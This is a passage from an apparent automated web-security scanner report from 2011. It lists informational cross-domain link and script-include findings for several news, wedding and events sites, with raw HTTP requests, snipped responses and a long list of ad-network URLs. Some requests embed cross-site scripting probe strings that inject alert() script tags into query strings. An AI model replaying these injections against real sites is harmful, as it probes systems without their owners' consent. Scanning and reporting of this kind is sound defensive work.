...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<p align="center"><img src="http://www.soundingspub.com/images/cgaux_graphics/cgaux.gif" width="150" border="0" height="150" /></a>
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=58g&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"> <img src="/images/cgaux_graphics/SND.Jul.09.jpg" width="100" border="0" height="135" />
...[SNIP]...
<p align="center"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=51M&SOURCE=INT75&RDRID=&SBTYPE=QN&PGTP=S"><img src="/images/cgaux_graphics/trade_1008_cover_100p.jpg" width="100" border="0" height="135" />
...[SNIP]...
<div class="chronoform">
<a href="http://www.chronoengine.com">Joomla Professional Work</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

17.326. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

Issue detail

The page was loaded from a URL containing a query string:

http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E

The response contains the following links to other domains:

http://b.collective-media.net/seg/cm/de18_1
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A
http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
http://www.barkerstores.com/soundings
http://www.barkerstores.com/soundings/
http://www.buybooks.ws/
http://www.dominionenterprises.com/main/do/Privacy_Policy
http://www.dominionenterprises.com/main/do/Terms_of_Use
http://www.paperg.com/
http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123
http://www.soundingssellmyboat.com/
http://yurivolkov.com/Joomla/yvComment/index_en.html

Request

GET /news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: count=6; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; s_vnum=1298514239669%26vn%3D2; s_lv=1295961240451; count=5; __utma=1.435913462.1295922240.1295922240.1295961240.2

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:02:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>
...[SNIP]...
www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
           <area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollO
...[SNIP]...
<li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=XX&PGTP=A"><span>
...[SNIP]...
<li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=AC&PGTP=A"><span>
...[SNIP]...
<li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=5U6&SOURCE=INET&RDRID=&SBTYPE=QR&PGTP=A"><span>
...[SNIP]...
<li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=SND&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S"><span>
...[SNIP]...
<li class="item232"><a href="http://www.barkerstores.com/soundings/"><span>
...[SNIP]...
<div style="width:150px; height:1px; padding:0px; font:11px Tahoma; overflow:hidden;"><a href="http://www.buybooks.ws/" title="Ebooks buy">Ebooks buy</A>
...[SNIP]...
<div class='CommentPoweredBy'><a href="http://yurivolkov.com/Joomla/yvComment/index_en.html" target="_blank" rel="nofollow">yvComment v.1.24.0</a>
...[SNIP]...
</div>
           -->

       <script type="text/javascript" src="http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123"></script><br /><div id="PG_link" align="center"><a href="http://www.paperg.com/">Local advertising</a>
...[SNIP]...
<li class="item58"><a href="http://www.dominionenterprises.com/main/do/Privacy_Policy" target="_blank"><span>
...[SNIP]...
<li class="item57"><a href="http://www.dominionenterprises.com/main/do/Terms_of_Use" target="_blank"><span>
...[SNIP]...
</script>
<img src="http://b.collective-media.net/seg/cm/de18_1" width="1" height="1" />
</body>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stylemepretty.com
Path:	/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.msn.com\|msn.com/wonderwall\|v14.msn.com/\|preview.msn.com/\|www.msn.com/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page was loaded from a URL containing a query string:

http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2
http://platform.twitter.com/widgets.js?ver=3.0.4
http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4
http://stats.wordpress.com/e-201104.js
http://www.facebook.com/pages/Style-Me-Pretty/51850479973
http://www.twitter.com/stylemepretty

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:06:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:09 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:06:09 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://
...[SNIP]...
<link rel="pingback" href="http://www.stylemepretty.com/xmlrpc.php" />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js?ver=1.4.2'></script>
...[SNIP]...
<td style="padding-bottom: 10px; padding-left:10px; vertical-align:middle;" ><a style="font-size:1.1em;" rel="nofollow" href="http://www.facebook.com/pages/Style-Me-Pretty/51850479973">Visit us on <b>
...[SNIP]...
<td style="padding-left:10px; vertical-align:middle; padding-bottom:10px;" ><a style="font-size:1.1em;" rel="nofollow" href="http://www.twitter.com/stylemepretty">Follow us on <b>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=3.0.4'></script>
<script type='text/javascript' src='http://static.ak.fbcdn.net/connect.php/js/FB.Share?ver=3.0.4'></script>
<script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

17.328. http://www.zvents.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(1

The response contains the following links to other domains:

http://ads.bluelithium.com/pixel?id=883607&t=2
http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif
http://www.google-analytics.com/urchin.js
http://www.omniture.com/
https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=
https://secure.adnxs.com/seg?add=87103&t=2
https://secure.adnxs.com/seg?add=87282&t=2

Request

GET /?376e5%22%3E%3Cscript%3Ealert(1 HTTP/1.1
Host: www.zvents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vi=[CS]v1|26A17F6A851D2D92-40000133A02724D7[CE]; _zsess=BAh7BjoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQ%3D--9b4a8bd2505fe56c893d99cf4974f985b2e3882e; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 04:47:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 36
ETag: "f6fdb354bde5166311154377417abd13"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlOTVjMjQ1ZmI1MTI0ZDg2MjJhNmQyMzI1ZWU4ODZkMGQiDWxvY2F0aW9uexAiCWNpdHkiC0RhbGxhcyILcmFkaXVzaVAiDWxhdGl0dWRlZhczMi43ODI1MDEyMjA3MDMxMjUiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhZBbWVyaWNhL01vbnRlcnJleSITZGlzcGxheV9zdHJpbmciD0RhbGxhcywgVFgiDGNvdW50cnkiElVuaXRlZCBTdGF0ZXMiDmxvbmdpdHVkZWYYLTk2LjgyMDcwMTU5OTEyMTA5NCIRd2hlcmVfc3RyaW5nQBQiCnN0YXRlIgdUWA%3D%3D--e5ccfcada25365dd2467a440cdadee91225f4fd0; path=/; expires=Fri, 29-Apr-2011 04:47:18 GMT; HttpOnly
Content-Length: 62688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
</script>

<img border="0" src="https://r.turn.com/r/beacon?b2=6HlPZst5Lbpa4Q0bnCjk29eeq-vgwHuv9M537E8_UCe8VoKBMY3PiJdxH5h7LTsMIfnjQj5FBgFLdQEkX-S0zA&cid=">


<img src="https://secure.adnxs.com/seg?add=87103&t=2" width="1" height="1" />

...[SNIP]...

<img src="https://secure.adnxs.com/seg?add=87282&t=2" width="1" height="1" />

...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<div class='ad_comp'><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>


<img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" />
<script type="text/javascript" charset="utf-8">
...[SNIP]...

17.329. http://xads.zedo.com/ads2/c previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://xads.zedo.com
Path:	/ads2/c

Issue detail

The page was loaded from a URL containing a query string:

http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

The response contains the following link to another domain:

http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/ HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18. Cross-domain script include previous next
There are 903 instances of this issue:

http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
http://ad.afy11.net/ad
http://ad.afy11.net/ad
http://ad.afy11.net/ad
http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2
http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048
http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7
http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2
http://ad.doubleclick.net/adi/N4319.msn/B2087123.382
http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4
http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5
http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/160/12510810860@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10063835233@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10085444835@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17813775416@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/18360874151@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/11376353412@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/13043720030@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/15284078472@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17127515176@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17338583388@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/17437264561@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18217671154@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18413765675@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/18503855336@x90
http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90
http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90
http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90
http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90
http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90
https://base.liveperson.net/hc/5296924/
http://bh.heraldinteractive.com/includes/processAds.bg
http://bh.heraldinteractive.com/includes/processAds.bg
http://bh.heraldinteractive.com/includes/processAds.bg
http://bh.heraldinteractive.com/includes/processAds.bg
http://bh.heraldinteractive.com/includes/processAds.bg
http://bh.heraldinteractive.com/includes/processAds.bg
http://boston30.autochooser.com/results.asp
http://bostonherald.com/blogs/entertainment/the_assistant/
http://bostonherald.com/blogs/lifestyle/fork_lift/
http://bostonherald.com/news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/
http://bostonherald.com/news/document.bg
